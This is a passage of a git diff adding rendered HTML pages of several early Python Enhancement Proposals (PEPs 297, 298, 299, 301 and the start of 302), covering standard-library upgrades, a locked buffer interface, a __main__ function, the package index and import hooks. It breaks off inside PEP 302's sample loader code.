Since Python’s standard library is starting to host packages which +are also available separately, e.g. the distutils, email and PyXML +packages, which can also be installed independently of the Python +distribution, it is desirable to have an option to upgrade these +packages without having to wait for a new patch level release of +the Python interpreter to bring along the changes.

+

On some occasions, it may also be desirable to update modules of +the standard library without going through the whole Python release +cycle, e.g. in order to provide hot-fixes for security problems.

+
+
+

Proposed Solutions

+

This PEP proposes two different but not necessarily conflicting +solutions:

+
    +
  1. Adding a new standard search path to sys.path: +$stdlibpath/system-packages just before the $stdlibpath +entry. This complements the already existing entry for site +add-ons $stdlibpath/site-packages which is appended to the +sys.path at interpreter startup time.

    To make use of this new standard location, distutils will need +to grow support for installing certain packages in +$stdlibpath/system-packages rather than the standard location +for third-party packages $stdlibpath/site-packages.

    +
  2. +
  3. Tweaking distutils to install directly into $stdlibpath for the +system upgrades rather than into $stdlibpath/site-packages.
  4. +
+

The first solution has a few advantages over the second:

+
    +
  • upgrades can be easily identified (just look in +$stdlibpath/system-packages)
  • +
  • upgrades can be de-installed without affecting the rest +of the interpreter installation
  • +
  • modules can be virtually removed from packages; this is +due to the way Python imports packages: once it finds the +top-level package directory it stay in this directory for +all subsequent package submodule imports
  • +
  • the approach has an overall much cleaner design than the +hackish install on top of an existing installation approach
  • +
+

The only advantages of the second approach are that the Python +interpreter does not have to changed and that it works with +older Python versions.

+

Both solutions require changes to distutils. These changes can +also be implemented by package authors, but it would be better to +define a standard way of switching on the proposed behaviour.

+
+
+

Scope

+

Solution 1: Python 2.6 and up

+

Solution 2: all Python versions supported by distutils

+
+
+

Credits

+

None

+
+
+

References

+

None

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0297.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0298/index.html b/pep-0298/index.html new file mode 100644 index 00000000000..d678c988355 --- /dev/null +++ b/pep-0298/index.html @@ -0,0 +1,325 @@ + + + + + + + + PEP 298 – The Locked Buffer Interface | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 298 – The Locked Buffer Interface

+
+
Author:
+
Thomas Heller <theller at python.net>
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
26-Jul-2002
+
Python-Version:
+
2.3
+
Post-History:
+
30-Jul-2002, 01-Aug-2002
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes an extension to the buffer interface called the +‘locked buffer interface’.

+

The locked buffer interface avoids the flaws of the ‘old’ buffer +interface [1] as defined in Python versions up to and including +2.2, and has the following semantics:

+
    +
  • The lifetime of the retrieved pointer is clearly defined and +controlled by the client.
  • +
  • The buffer size is returned as a ‘size_t’ data type, which +allows access to large buffers on platforms where sizeof(int) +!= sizeof(void *).
  • +
+

(Guido comments: This second sounds like a change we could also +make to the “old” buffer interface, if we introduce another flag +bit that’s not part of the default flags.)

+
+
+

Specification

+

The locked buffer interface exposes new functions which return the +size and the pointer to the internal memory block of any python +object which chooses to implement this interface.

+

Retrieving a buffer from an object puts this object in a locked +state during which the buffer may not be freed, resized, or +reallocated.

+

The object must be unlocked again by releasing the buffer if it’s +no longer used by calling another function in the locked buffer +interface. If the object never resizes or reallocates the buffer +during its lifetime, this function may be NULL. Failure to call +this function (if it is != NULL) is a programming error and may +have unexpected results.

+

The locked buffer interface omits the memory segment model which +is present in the old buffer interface - only a single memory +block can be exposed.

+

The memory blocks can be accessed without holding the global +interpreter lock.

+
+
+

Implementation

+

Define a new flag in Include/object.h:

+
/* PyBufferProcs contains bf_acquirelockedreadbuffer,
+   bf_acquirelockedwritebuffer, and bf_releaselockedbuffer */
+#define Py_TPFLAGS_HAVE_LOCKEDBUFFER (1L<<15)
+
+
+

This flag would be included in Py_TPFLAGS_DEFAULT:

+
#define Py_TPFLAGS_DEFAULT  ( \
+                    ....
+                    Py_TPFLAGS_HAVE_LOCKEDBUFFER | \
+                    ....
+                    0)
+
+
+

Extend the PyBufferProcs structure by new fields in +Include/object.h:

+
typedef size_t (*acquirelockedreadbufferproc)(PyObject *,
+                                              const void **);
+typedef size_t (*acquirelockedwritebufferproc)(PyObject *,
+                                               void **);
+typedef void (*releaselockedbufferproc)(PyObject *);
+
+typedef struct {
+    getreadbufferproc bf_getreadbuffer;
+    getwritebufferproc bf_getwritebuffer;
+    getsegcountproc bf_getsegcount;
+    getcharbufferproc bf_getcharbuffer;
+    /* locked buffer interface functions */
+    acquirelockedreadbufferproc bf_acquirelockedreadbuffer;
+    acquirelockedwritebufferproc bf_acquirelockedwritebuffer;
+    releaselockedbufferproc bf_releaselockedbuffer;
+} PyBufferProcs;
+
+
+

The new fields are present if the Py_TPFLAGS_HAVE_LOCKEDBUFFER +flag is set in the object’s type.

+

The Py_TPFLAGS_HAVE_LOCKEDBUFFER flag implies the +Py_TPFLAGS_HAVE_GETCHARBUFFER flag.

+

The acquirelockedreadbufferproc and acquirelockedwritebufferproc +functions return the size in bytes of the memory block on success, +and fill in the passed void * pointer on success. If these +functions fail - either because an error occurs or no memory block +is exposed - they must set the void * pointer to NULL and raise an +exception. The return value is undefined in these cases and +should not be used.

+

If calls to these functions succeed, eventually the buffer must be +released by a call to the releaselockedbufferproc, supplying the +original object as argument. The releaselockedbufferproc cannot +fail. For objects that actually maintain an internal lock count +it would be a fatal error if the releaselockedbufferproc function +would be called too often, leading to a negative lock count.

+

Similar to the ‘old’ buffer interface, any of these functions may +be set to NULL, but it is strongly recommended to implement the +releaselockedbufferproc function (even if it does nothing) if any +of the acquireread/writelockedbufferproc functions are +implemented, to discourage extension writers from checking for a +NULL value and not calling it.

+

These functions aren’t supposed to be called directly, they are +called through convenience functions declared in +Include/abstract.h:

+
int PyObject_AcquireLockedReadBuffer(PyObject *obj,
+                                    const void **buffer,
+                                    size_t *buffer_len);
+
+int PyObject_AcquireLockedWriteBuffer(PyObject *obj,
+                                      void **buffer,
+                                      size_t *buffer_len);
+
+void PyObject_ReleaseLockedBuffer(PyObject *obj);
+
+
+

The former two functions return 0 on success, set buffer to the +memory location and buffer_len to the length of the memory block +in bytes. On failure, or if the locked buffer interface is not +implemented by obj, they return -1 and set an exception.

+

The latter function doesn’t return anything, and cannot fail.

+
+
+

Backward Compatibility

+

The size of the PyBufferProcs structure changes if this proposal +is implemented, but the type’s tp_flags slot can be used to +determine if the additional fields are present.

+
+
+

Reference Implementation

+

An implementation has been uploaded to the SourceForge patch +manager as https://bugs.python.org/issue652857.

+
+
+

Additional Notes/Comments

+

Python strings, unicode strings, mmap objects, and array objects +would expose the locked buffer interface.

+

mmap and array objects would actually enter a locked state while +the buffer is active, this is not needed for strings and unicode +objects. Resizing locked array objects is not allowed and will +raise an exception. Whether closing a locked mmap object is an +error or will only be deferred until the lock count reaches zero +is an implementation detail.

+

Guido recommends

+
+
But I’m still very concerned that if most built-in types +(e.g. strings, bytes) don’t implement the release +functionality, it’s too easy for an extension to seem to work +while forgetting to release the buffer.

I recommend that at least some built-in types implement the +acquire/release functionality with a counter, and assert that +the counter is zero when the object is deleted – if the +assert fails, someone DECREF’ed their reference to the object +without releasing it. (The rule should be that you must own a +reference to the object while you’ve acquired the object.)

+

For strings that might be impractical because the string +object would have to grow 4 bytes to hold the counter; but the +new bytes object (PEP 296) could easily implement the counter, +and the array object too – that way there will be plenty of +opportunity to test proper use of the protocol.

+
+
+
+

Community Feedback

+

Greg Ewing doubts the locked buffer interface is needed at all, he +thinks the normal buffer interface could be used if the pointer is +(re)fetched each time it’s used. This seems to be dangerous, +because even innocent looking calls to the Python API like +Py_DECREF() may trigger execution of arbitrary Python code.

+

The first version of this proposal didn’t have the release +function, but it turned out that this would have been too +restrictive: mmap and array objects wouldn’t have been able to +implement it, because mmap objects can be closed anytime if not +locked, and array objects could resize or reallocate the buffer.

+

This PEP will probably be rejected because nobody except the +author needs it.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0298.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0299/index.html b/pep-0299/index.html new file mode 100644 index 00000000000..9f95e1ad554 --- /dev/null +++ b/pep-0299/index.html @@ -0,0 +1,232 @@ + + + + + + + + PEP 299 – Special __main__() function in modules | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 299 – Special __main__() function in modules

+
+
Author:
+
Jeff Epler <jepler at unpythonic.net>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
12-Aug-2002
+
Python-Version:
+
2.3
+
Post-History:
+
29-Mar-2006
+
+
+
+
Table of Contents +
+
+

Abstract

+

Many Python modules are also intended to be callable as standalone +scripts. This PEP proposes that a special function called __main__() +should serve this purpose.

+
+
+

Motivation

+

There should be one simple and universal idiom for invoking a module +as a standalone script.

+

The semi-standard idiom:

+
if __name__ == '__main__':
+    perform "standalone" functionality
+
+
+

is unclear to programmers of languages like C and C++. It also does +not permit invocation of the standalone function when the module is +imported. The variant:

+
if __name__ == '__main__':
+    main_function()
+
+
+

is sometimes seen, but there exists no standard name for the function, +and because arguments are taken from sys.argv it is not possible to +pass specific arguments without changing the argument list seen by all +other modules. (Imagine a threaded Python program, with two threads +wishing to invoke the standalone functionality of different modules +with different argument lists)

+
+
+

Proposal

+

The standard name of the ‘main function’ should be __main__. When a +module is invoked on the command line, such as:

+
python mymodule.py
+
+
+

then the module behaves as though the following lines existed at the +end of the module (except that the attribute __sys may not be used or +assumed to exist elsewhere in the script):

+
if globals().has_key("__main__"):
+    import sys as __sys
+    __sys.exit(__main__(__sys.argv))
+
+
+

Other modules may execute:

+
import mymodule mymodule.__main__(['mymodule', ...])
+
+
+

It is up to mymodule to document thread-safety issues or other +issues which might restrict use of __main__. (Other issues might +include use of mutually exclusive GUI modules, non-sharable resources +like hardware devices, reassignment of sys.stdin/stdout, etc)

+
+
+

Implementation

+

In modules/main.c, the block near line 385 (after the +PyRun_AnyFileExFlags call) will be changed so that the above code +(or its C equivalent) is executed.

+
+
+

Open Issues

+
    +
  • Should the return value from __main__ be treated as the exit value?

    Yes. Many __main__ will naturally return None, which +sys.exit translates into a “success” return code. In those that +return a numeric result, it behaves just like the argument to +sys.exit() or the return value from C’s main().

    +
  • +
  • Should the argument list to __main__ include argv[0], or just the +“real” arguments argv[1:]?

    argv[0] is included for symmetry with sys.argv and easy +transition to the new standard idiom.

    +
  • +
+
+
+

Rejection

+

In a short discussion on python-dev [1], two major backwards +compatibility problems were brought up and Guido pronounced that he +doesn’t like the idea anyway as it’s “not worth the change (in docs, +user habits, etc.) and there’s nothing particularly broken.”

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0299.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0301/index.html b/pep-0301/index.html new file mode 100644 index 00000000000..48cb4dacab6 --- /dev/null +++ b/pep-0301/index.html @@ -0,0 +1,481 @@ + + + + + + + + PEP 301 – Package Index and Metadata for Distutils | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 301 – Package Index and Metadata for Distutils

+
+
Author:
+
Richard Jones <richard at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
24-Oct-2002
+
Python-Version:
+
2.3
+
Post-History:
+
08-Nov-2002
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes several extensions to the Distutils packaging system +[1]. These enhancements include a central package index server, +tools for submitting package information to the index and extensions +to the package metadata to include Trove [2] information.

+

This PEP does not address issues of package dependency. It also does +not address storage and download of packages as described in PEP 243. +Nor is it proposing a local database of packages as described +in PEP 262.

+

Existing package repositories such as the Vaults of Parnassus [3], +CPAN [4] and PAUSE [5] will be investigated as prior art in this +field.

+
+
+

Rationale

+

Python programmers have long needed a simple method of discovering +existing modules and systems available for their use. It is arguable +that the existence of these systems for other languages have been a +significant contribution to their popularity. The existence of the +Catalog-SIG, and the many discussions there indicate that there is a +large population of users who recognise this need.

+

The introduction of the Distutils packaging system to Python +simplified the process of distributing shareable code, and included +mechanisms for the capture of package metadata, but did little with +the metadata save ship it with the package.

+

An interface to the index should be hosted in the python.org domain, +giving it an air of legitimacy that existing catalog efforts do not +have.

+

The interface for submitting information to the catalog should be as +simple as possible - hopefully just a one-line command for most users.

+

Issues of package dependency are not addressed due to the complexity +of such a system. PEP 262 proposes such a system, but as of this +writing the PEP is still unfinished.

+

Issues of package dissemination (storage on a central server) are +not addressed because they require assumptions about availability of +storage and bandwidth that I am not in a position to make. PEP 243, +which is still being developed, is tackling these issues and many +more. This proposal is considered compatible with, and adjunct to +the proposal in PEP 243.

+
+
+

Specification

+

The specification takes three parts, the web interface, the +Distutils register command and the Distutils Trove +classification.

+
+

Web Interface

+

A web interface is implemented over a simple store. The interface is +available through the python.org domain, either directly or as +packages.python.org.

+

The store has columns for all metadata fields. The (name, version) +double is used as a uniqueness key. Additional submissions for an +existing (name, version) will result in an update operation.

+

The web interface implements the following commands/interfaces:

+
+
index
Lists known packages, optionally filtered. An additional HTML page, +search, presents a form to the user which is used to customise +the index view. The index will include a browsing interface like +that presented in the Trove interface design section 4.3. The +results will be paginated, sorted alphabetically and only showing +the most recent version. The most recent version information will +be determined using the Distutils LooseVersion class.
+
display
Displays information about the package. All fields are displayed as +plain text. The “url” (or “home_page”) field is hyperlinked.
+
submit
Accepts a POST submission of metadata about a package. The +“name” and “version” fields are mandatory, as they uniquely identify +an entry in the index. Submit will automatically determine +whether to create a new entry or update an existing entry. The +metadata is checked for correctness where appropriate - specifically +the Trove discriminators are compared with the allowed set. An +update will update all information about the package based on the +new submitted information.

There will also be a submit/edit form that will allow manual +submission and updating for those who do not use Distutils.

+
+
submit_pkg_info
Accepts a POST submission of a PKG-INFO file and performs the same +function as the submit interface.
+
user
Registers a new user with the index. Requires username, password +and email address. Passwords will be stored in the index database +as SHA hashes. If the username already exists in the database:
    +
  1. If valid HTTP Basic authentication is provided, the password and +email address are updated with the submission information, or
  2. +
  3. If no valid authentication is provided, the user is informed that +the login is already taken.
  4. +
+

Registration will be a three-step process, involving:

+
    +
  1. User submission of details via the Distutils register command +or through the web,
  2. +
  3. Index server sending email to the user’s email address with a URL +to visit to confirm registration with a random one-time key, and
  4. +
  5. User visits URL with the key and confirms registration.
  6. +
+
+
roles
An interface for changing user Role assignments.
+
password_reset
Using a supplied email address as the key, this resets a user’s +password and sends an email with the new password to the user.
+
+

The submit command will require HTTP Basic authentication, +preferably over an HTTPS connection.

+

The server interface will indicate success or failure of the commands +through a subset of the standard HTTP response codes:

+ + + + + + + + + + + + + + + + + + + + + + + + + +
CodeMeaningRegister command implications
200OKEverything worked just fine
400Bad requestData provided for submission was malformed
401UnauthorisedThe username or password supplied were incorrect
403ForbiddenUser does not have permission to update the +package information (not Owner or Maintainer)
+
+
+

User Roles

+

Three user Roles will be assignable to users:

+
+
Owner
Owns a package name, may assign Maintainer Role for that name. The +first user to register information about a package is deemed Owner +of the package name. The Admin user may change this if necessary. +May submit updates for the package name.
+
Maintainer
Can submit and update info for a particular package name.
+
Admin
Can assign Owner Role and edit user details. Not specific to a +package name.
+
+
+
+

Index Storage (Schema)

+

The index is stored in a set of relational database tables:

+
+
packages
Lists package names and holds package-level metadata (currently +just the stable release version)
+
releases
Each package has an entry in releases for each version of the +package that is released. A row holds the bulk of the information +given in the package’s PKG-INFO file. There is one row for each +package (name, version).
+
trove_discriminators
Lists the Trove discriminator text and assigns each one a unique +ID.
+
release_discriminators
Each entry maps a package (name, version) to a +discriminator_id. We map to releases instead of packages because +the set of discriminators may change between releases.
+
journals
Holds information about changes to package information in the +index. Changes to the packages, releases, roles, +and release_discriminators tables are listed here by +package name and version if the change is release-specific.
+
users
Holds our user database - user name, email address and password.
+
roles
Maps user_name and role_name to a package_name.
+
+

An additional table, rego_otk holds the One Time Keys generated +during registration and is not interesting in the scope of the index +itself.

+
+
+

Distutils register Command

+

An additional Distutils command, register, is implemented which +posts the package metadata to the central index. The register +command automatically handles user registration; the user is presented +with three options:

+
    +
  1. login and submit package information
  2. +
  3. register as a new packager
  4. +
  5. send password reminder email
  6. +
+

On systems where the $HOME environment variable is set, the user +will be prompted at exit to save their username/password to a file +in their $HOME directory in the file .pypirc.

+

Notification of changes to a package entry will be sent to all users +who have submitted information about the package. That is, the +original submitter and any subsequent updaters.

+

The register command will include a --verify option which +performs a test submission to the index without actually committing +the data. The index will perform its submission verification checks +as usual and report any errors it would have reported during a normal +submission. This is useful for verifying correctness of Trove +discriminators.

+
+
+

Distutils Trove Classification

+

The Trove concept of discrimination will be added to the metadata +set available to package authors through the new attribute +“classifiers”. The list of classifiers will be available through the +web, and added to the package like so:

+
setup(
+    name = "roundup",
+    version = __version__,
+    classifiers = [
+        'Development Status :: 4 - Beta',
+        'Environment :: Console',
+        'Environment :: Web Environment',
+        'Intended Audience :: End Users/Desktop',
+        'Intended Audience :: Developers',
+        'Intended Audience :: System Administrators',
+        'License :: OSI Approved :: Python Software Foundation License',
+        'Operating System :: MacOS :: MacOS X',
+        'Operating System :: Microsoft :: Windows',
+        'Operating System :: POSIX',
+        'Programming Language :: Python',
+        'Topic :: Communications :: Email',
+        'Topic :: Office/Business',
+        'Topic :: Software Development :: Bug Tracking',
+    ],
+    url = 'http://sourceforge.net/projects/roundup/',
+    ...
+)
+
+
+

It was decided that strings would be used for the classification +entries due to the deep nesting that would be involved in a more +formal Python structure.

+

The original Trove specification that classification namespaces be +separated by slashes (“/”) unfortunately collides with many of the +names having slashes in them (e.g. “OS/2”). The double-colon solution +(” :: “) implemented by SourceForge and FreshMeat gets around this +limitation.

+

The list of classification values on the module index has been merged +from FreshMeat and SourceForge (with their permission). This list +will be made available both through the web interface and through the +register command’s --list-classifiers option as a text list +which may then be copied to the setup.py file. The register +command’s --verify option will check classifiers values against +the server’s list.

+

Unfortunately, the addition of the “classifiers” property is not +backwards-compatible. A setup.py file using it will not work under +Python 2.1.3. It is hoped that a bug-fix release of Python 2.2 (most +likely 2.2.3) will relax the argument checking of the setup() command +to allow new keywords, even if they’re not actually used. It is +preferable that a warning be produced, rather than a show-stopping +error. The use of the new keyword should be discouraged in situations +where the package is advertised as being compatible with python +versions earlier than 2.2.3 or 2.3.

+

In the PKG-INFO, the classifiers list items will appear as individual +Classifier: entries:

+
Name: roundup
+Version: 0.5.2
+Classifier: Development Status :: 4 - Beta
+Classifier: Environment :: Console (Text Based)
+            .
+            .
+Classifier: Topic :: Software Development :: Bug Tracking
+Url: http://sourceforge.net/projects/roundup/
+
+
+
+
+
+

Implementation

+

The server is available at:

+
+
+

The code is available from the SourceForge project:

+
+
+

The register command has been integrated into Python 2.3.

+
+
+

Rejected Proposals

+

Originally, the index server was to return custom headers (inspired by +PEP 243):

+
+
X-Pypi-Status
Either “success” or “fail”.
+
X-Pypi-Reason
A description of the reason for failure, or additional information +in the case of a success.
+
+

However, it has been pointed out [6] that this is a bad scheme to +use.

+
+
+

References

+ +
+ +
+

Acknowledgements

+

Anthony Baxter, Martin v. Loewis and David Goodger for encouragement +and feedback during initial drafting.

+

A.M. Kuchling for support including hosting the second prototype.

+

Greg Stein for recommending that the register command interpret the +HTTP response codes rather than custom X-PyPI-* headers.

+

The many participants of the Distutils and Catalog SIGs for their +ideas over the years.

+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0301.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0302/index.html b/pep-0302/index.html new file mode 100644 index 00000000000..5b9388d3faa --- /dev/null +++ b/pep-0302/index.html @@ -0,0 +1,644 @@ + + + + + + + + PEP 302 – New Import Hooks | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 302 – New Import Hooks

+
+
Author:
+
Just van Rossum <just at letterror.com>, +Paul Moore <p.f.moore at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
19-Dec-2002
+
Python-Version:
+
2.3
+
Post-History:
+
19-Dec-2002
+
+
+
+
Table of Contents +
+
+

Warning

+

The language reference for import [10] and importlib documentation +[11] now supersede this PEP. This document is no longer updated +and provided for historical purposes only.

+
+
+

Abstract

+

This PEP proposes to add a new set of import hooks that offer better +customization of the Python import mechanism. Contrary to the current +__import__ hook, a new-style hook can be injected into the existing +scheme, allowing for a finer grained control of how modules are found and how +they are loaded.

+
+
+

Motivation

+

The only way to customize the import mechanism is currently to override the +built-in __import__ function. However, overriding __import__ has many +problems. To begin with:

+
    +
  • An __import__ replacement needs to fully reimplement the entire +import mechanism, or call the original __import__ before or after the +custom code.
  • +
  • It has very complex semantics and responsibilities.
  • +
  • __import__ gets called even for modules that are already in +sys.modules, which is almost never what you want, unless you’re writing +some sort of monitoring tool.
  • +
+

The situation gets worse when you need to extend the import mechanism from C: +it’s currently impossible, apart from hacking Python’s import.c or +reimplementing much of import.c from scratch.

+

There is a fairly long history of tools written in Python that allow extending +the import mechanism in various way, based on the __import__ hook. The +Standard Library includes two such tools: ihooks.py (by GvR) and +imputil.py [1] (Greg Stein), but perhaps the most famous is iu.py by +Gordon McMillan, available as part of his Installer package. Their usefulness +is somewhat limited because they are written in Python; bootstrapping issues +need to worked around as you can’t load the module containing the hook with +the hook itself. So if you want the entire Standard Library to be loadable +from an import hook, the hook must be written in C.

+
+
+

Use cases

+

This section lists several existing applications that depend on import hooks. +Among these, a lot of duplicate work was done that could have been saved if +there had been a more flexible import hook at the time. This PEP should make +life a lot easier for similar projects in the future.

+

Extending the import mechanism is needed when you want to load modules that +are stored in a non-standard way. Examples include modules that are bundled +together in an archive; byte code that is not stored in a pyc formatted +file; modules that are loaded from a database over a network.

+

The work on this PEP was partly triggered by the implementation of PEP 273, +which adds imports from Zip archives as a built-in feature to Python. While +the PEP itself was widely accepted as a must-have feature, the implementation +left a few things to desire. For one thing it went through great lengths to +integrate itself with import.c, adding lots of code that was either +specific for Zip file imports or not specific to Zip imports, yet was not +generally useful (or even desirable) either. Yet the PEP 273 implementation +can hardly be blamed for this: it is simply extremely hard to do, given the +current state of import.c.

+

Packaging applications for end users is a typical use case for import hooks, +if not the typical use case. Distributing lots of source or pyc files +around is not always appropriate (let alone a separate Python installation), +so there is a frequent desire to package all needed modules in a single file. +So frequent in fact that multiple solutions have been implemented over the +years.

+

The oldest one is included with the Python source code: Freeze [2]. It puts +marshalled byte code into static objects in C source code. Freeze’s “import +hook” is hard wired into import.c, and has a couple of issues. Later +solutions include Fredrik Lundh’s Squeeze, Gordon McMillan’s Installer, and +Thomas Heller’s py2exe [3]. MacPython ships with a tool called +BuildApplication.

+

Squeeze, Installer and py2exe use an __import__ based scheme (py2exe +currently uses Installer’s iu.py, Squeeze used ihooks.py), MacPython +has two Mac-specific import hooks hard wired into import.c, that are +similar to the Freeze hook. The hooks proposed in this PEP enables us (at +least in theory; it’s not a short-term goal) to get rid of the hard coded +hooks in import.c, and would allow the __import__-based tools to get +rid of most of their import.c emulation code.

+

Before work on the design and implementation of this PEP was started, a new +BuildApplication-like tool for Mac OS X prompted one of the authors of +this PEP (JvR) to expose the table of frozen modules to Python, in the imp +module. The main reason was to be able to use the freeze import hook +(avoiding fancy __import__ support), yet to also be able to supply a set +of modules at runtime. This resulted in issue #642578 [4], which was +mysteriously accepted (mostly because nobody seemed to care either way ;-). +Yet it is completely superfluous when this PEP gets accepted, as it offers a +much nicer and general way to do the same thing.

+
+
+

Rationale

+

While experimenting with alternative implementation ideas to get built-in Zip +import, it was discovered that achieving this is possible with only a fairly +small amount of changes to import.c. This allowed to factor out the +Zip-specific stuff into a new source file, while at the same time creating a +general new import hook scheme: the one you’re reading about now.

+

An earlier design allowed non-string objects on sys.path. Such an object +would have the necessary methods to handle an import. This has two +disadvantages: 1) it breaks code that assumes all items on sys.path are +strings; 2) it is not compatible with the PYTHONPATH environment variable. +The latter is directly needed for Zip imports. A compromise came from Jython: +allow string subclasses on sys.path, which would then act as importer +objects. This avoids some breakage, and seems to work well for Jython (where +it is used to load modules from .jar files), but it was perceived as an +“ugly hack”.

+

This led to a more elaborate scheme, (mostly copied from McMillan’s +iu.py) in which each in a list of candidates is asked whether it can +handle the sys.path item, until one is found that can. This list of +candidates is a new object in the sys module: sys.path_hooks.

+

Traversing sys.path_hooks for each path item for each new import can be +expensive, so the results are cached in another new object in the sys +module: sys.path_importer_cache. It maps sys.path entries to importer +objects.

+

To minimize the impact on import.c as well as to avoid adding extra +overhead, it was chosen to not add an explicit hook and importer object for +the existing file system import logic (as iu.py has), but to simply fall +back to the built-in logic if no hook on sys.path_hooks could handle the +path item. If this is the case, a None value is stored in +sys.path_importer_cache, again to avoid repeated lookups. (Later we can +go further and add a real importer object for the built-in mechanism, for now, +the None fallback scheme should suffice.)

+

A question was raised: what about importers that don’t need any entry on +sys.path? (Built-in and frozen modules fall into that category.) Again, +Gordon McMillan to the rescue: iu.py contains a thing he calls the +metapath. In this PEP’s implementation, it’s a list of importer objects +that is traversed before sys.path. This list is yet another new object +in the sys module: sys.meta_path. Currently, this list is empty by +default, and frozen and built-in module imports are done after traversing +sys.meta_path, but still before sys.path.

+
+
+

Specification part 1: The Importer Protocol

+

This PEP introduces a new protocol: the “Importer Protocol”. It is important +to understand the context in which the protocol operates, so here is a brief +overview of the outer shells of the import mechanism.

+

When an import statement is encountered, the interpreter looks up the +__import__ function in the built-in name space. __import__ is then +called with four arguments, amongst which are the name of the module being +imported (may be a dotted name) and a reference to the current global +namespace.

+

The built-in __import__ function (known as PyImport_ImportModuleEx() +in import.c) will then check to see whether the module doing the import is +a package or a submodule of a package. If it is indeed a (submodule of a) +package, it first tries to do the import relative to the package (the parent +package for a submodule). For example, if a package named “spam” does “import +eggs”, it will first look for a module named “spam.eggs”. If that fails, the +import continues as an absolute import: it will look for a module named +“eggs”. Dotted name imports work pretty much the same: if package “spam” does +“import eggs.bacon” (and “spam.eggs” exists and is itself a package), +“spam.eggs.bacon” is tried. If that fails “eggs.bacon” is tried. (There are +more subtleties that are not described here, but these are not relevant for +implementers of the Importer Protocol.)

+

Deeper down in the mechanism, a dotted name import is split up by its +components. For “import spam.ham”, first an “import spam” is done, and only +when that succeeds is “ham” imported as a submodule of “spam”.

+

The Importer Protocol operates at this level of individual imports. By the +time an importer gets a request for “spam.ham”, module “spam” has already been +imported.

+

The protocol involves two objects: a finder and a loader. A finder object +has a single method:

+
finder.find_module(fullname, path=None)
+
+
+

This method will be called with the fully qualified name of the module. If +the finder is installed on sys.meta_path, it will receive a second +argument, which is None for a top-level module, or package.__path__ +for submodules or subpackages [5]. It should return a loader object if the +module was found, or None if it wasn’t. If find_module() raises an +exception, it will be propagated to the caller, aborting the import.

+

A loader object also has one method:

+
loader.load_module(fullname)
+
+
+

This method returns the loaded module or raises an exception, preferably +ImportError if an existing exception is not being propagated. If +load_module() is asked to load a module that it cannot, ImportError is +to be raised.

+

In many cases the finder and loader can be one and the same object: +finder.find_module() would just return self.

+

The fullname argument of both methods is the fully qualified module name, +for example “spam.eggs.ham”. As explained above, when +finder.find_module("spam.eggs.ham") is called, “spam.eggs” has already +been imported and added to sys.modules. However, the find_module() +method isn’t necessarily always called during an actual import: meta tools +that analyze import dependencies (such as freeze, Installer or py2exe) don’t +actually load modules, so a finder shouldn’t depend on the parent package +being available in sys.modules.

+

The load_module() method has a few responsibilities that it must fulfill +before it runs any code:

+
    +
  • If there is an existing module object named ‘fullname’ in sys.modules, +the loader must use that existing module. (Otherwise, the reload() +builtin will not work correctly.) If a module named ‘fullname’ does not +exist in sys.modules, the loader must create a new module object and +add it to sys.modules.

    Note that the module object must be in sys.modules before the loader +executes the module code. This is crucial because the module code may +(directly or indirectly) import itself; adding it to sys.modules +beforehand prevents unbounded recursion in the worst case and multiple +loading in the best.

    +

    If the load fails, the loader needs to remove any module it may have +inserted into sys.modules. If the module was already in sys.modules +then the loader should leave it alone.

    +
  • +
  • The __file__ attribute must be set. This must be a string, but it may +be a dummy value, for example “<frozen>”. The privilege of not having a +__file__ attribute at all is reserved for built-in modules.
  • +
  • The __name__ attribute must be set. If one uses imp.new_module() +then the attribute is set automatically.
  • +
  • If it’s a package, the __path__ variable must be set. This must be a +list, but may be empty if __path__ has no further significance to the +importer (more on this later).
  • +
  • The __loader__ attribute must be set to the loader object. This is +mostly for introspection and reloading, but can be used for +importer-specific extras, for example getting data associated with an +importer.
  • +
  • The __package__ attribute must be set (PEP 366).

    If the module is a Python module (as opposed to a built-in module or a +dynamically loaded extension), it should execute the module’s code in the +module’s global name space (module.__dict__).

    +

    Here is a minimal pattern for a load_module() method:

    +
    # Consider using importlib.util.module_for_loader() to handle
    +# most of these details for you.
    +def load_module(self, fullname):
    +    code = self.get_code(fullname)
    +    ispkg = self.is_package(fullname)
    +    mod = sys.modules.setdefault(fullname, imp.new_module(fullname))
    +    mod.__file__ = "<%s>" % self.__class__.__name__
    +    mod.__loader__ = self
    +    if ispkg:
    +        mod.__path__ = []
    +        mod.__package__ = fullname
    +    else:
    +        mod.__package__ = fullname.rpartition('.')[0]
    +    exec(code, mod.__dict__)
